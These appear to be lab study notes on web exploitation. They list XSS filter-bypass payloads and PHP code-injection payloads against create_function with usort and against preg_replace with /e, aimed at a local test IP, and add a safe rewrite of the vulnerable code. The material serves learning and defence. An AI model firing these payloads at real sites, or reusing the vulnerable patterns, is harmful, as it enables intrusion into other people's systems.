1. <script>alert("xss")</script>
Plain XSS.
2. <Script>alert("xss")</Script>
Case bypass: the literal <script> is removed, the preg_replace function replaces it with an empty string, so a mixed-case tag slips through.
3. <scri<script>pt>alert("xss")</scri</script>pt>
<script> is removed, the preg_replace function replaces it with an empty string, so the nested tag reassembles into <script> after the removal.
4. <img src="1" onerror="alert('xss')">
preg_match with '/script/i' matches case-insensitively; the page outputs "error", so switch to another tag.
5. <script>confirm("xss")</script>
preg_match with '/alert/i', so use a different function.
6. xxs";alert($a);//
The output lands inside a <script> block.
7. xxs';alert($a);//
htmlentities: with its default flags (ENT_COMPAT, before PHP 8.1) it encodes double quotes but leaves single quotes alone.
8.
<script>alert('a')</script>
< and > are escaped, so the payload is constructed directly after the URL.
9.
<script>alert('1')</script>
The page reads the content after the # (URL fragment).
Code injection
example2:
usort + create_function leads to code execution
usort(): sorts an array with a user-supplied comparison function
create_function(): builds a function from a code string
Key code:
usort($users, create_function('$a, $b', 'return strcmp($a->'.$order.', $b->'.$order.');'));
<=>
function test($a, $b) {
    return strcmp($a->'.$order.', $b->'.$order.');
}
<=> (with $order taken from the payload below)
function test($a, $b) {
    return strcmp($a->id);}phpinfo();//, $b->id);
}
payload: http://192.168.40.132/codeexec/example2.php?order=id);}phpinfo();//
Note: the } in the payload closes the { of the function body built by create_function(), not the { of the surrounding if (isset(...)) {} block.
example3:
preg_replace with the /e modifier leads to code execution, PHP < 5.5.0
preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) : mixed
Searches subject for matches of pattern and replaces them with replacement; with /e the replacement is evaluated as PHP code.
payload: http://192.168.40.132/codeexec/example3.php?new=phpinfo()&pattern=/lamer/e&base=Hello%20lamer
Source code example:
<?php
// All three arguments come straight from the request: the attacker controls the
// pattern (and therefore the /e modifier) as well as the replacement that /e evaluates.
$pattern = $_GET['pattern'];
$replacement = $_GET['replacement'];
$subject = $_GET['subject'];
echo preg_replace($pattern, $replacement, $subject);
payload:http://127.0.0.1/test.php?pattern=/hello/e&replacement=phpinfo();&subject=hello code_injection!
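The two sinks above (example2's create_function() and example3's /e modifier) rewritten so that request data is only ever handled as data, as an added example that is not code from the original notes or from PentesterLab; the field allow-list, the sortUsersBy()/greet() names and the sample $users array are assumptions:

```php
<?php
// Added example, not code from the original notes or from PentesterLab.
// The allow-list, function names and $users sample data are assumptions.

// --- example2: sort without building code from $_GET['order'] ---
const SORTABLE_FIELDS = ['id', 'name', 'age'];

function sortUsersBy(array $users, string $order): array
{
    // An allow-list check replaces splicing $order into a code string.
    if (!in_array($order, SORTABLE_FIELDS, true)) {
        throw new InvalidArgumentException('unsupported sort field: ' . $order);
    }
    // A real closure captures $order as a value; there is no string-to-code
    // step, so "id);}phpinfo();//" is rejected above and can never run.
    usort($users, function ($a, $b) use ($order) {
        return strcmp((string) $a->$order, (string) $b->$order);
    });
    return $users;
}

// --- example3: replacement with a server-fixed pattern and no /e ---
function greet(string $subject, string $newName): string
{
    // The pattern is fixed server-side, so the caller cannot add /e
    // (deprecated in 5.5, removed in 7.0). preg_replace_callback calls a
    // function; it never eval()s the replacement text.
    return preg_replace_callback('/lamer/', function ($m) use ($newName) {
        return htmlspecialchars($newName, ENT_QUOTES, 'UTF-8');
    }, $subject);
}

// Constructed sample data.
$users = [
    (object) ['id' => '3', 'name' => 'carol', 'age' => '41'],
    (object) ['id' => '1', 'name' => 'alice', 'age' => '30'],
];

$sorted = sortUsersBy($users, 'name');
echo implode(',', array_map(function ($u) { return $u->name; }, $sorted)), "\n";

try {
    // Same shape as the example2 payload: rejected before any code is built.
    sortUsersBy($users, 'id);}phpinfo();//');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// The example3 "new" value is emitted as text, not executed.
echo greet('Hello lamer', 'phpinfo()'), "\n";
```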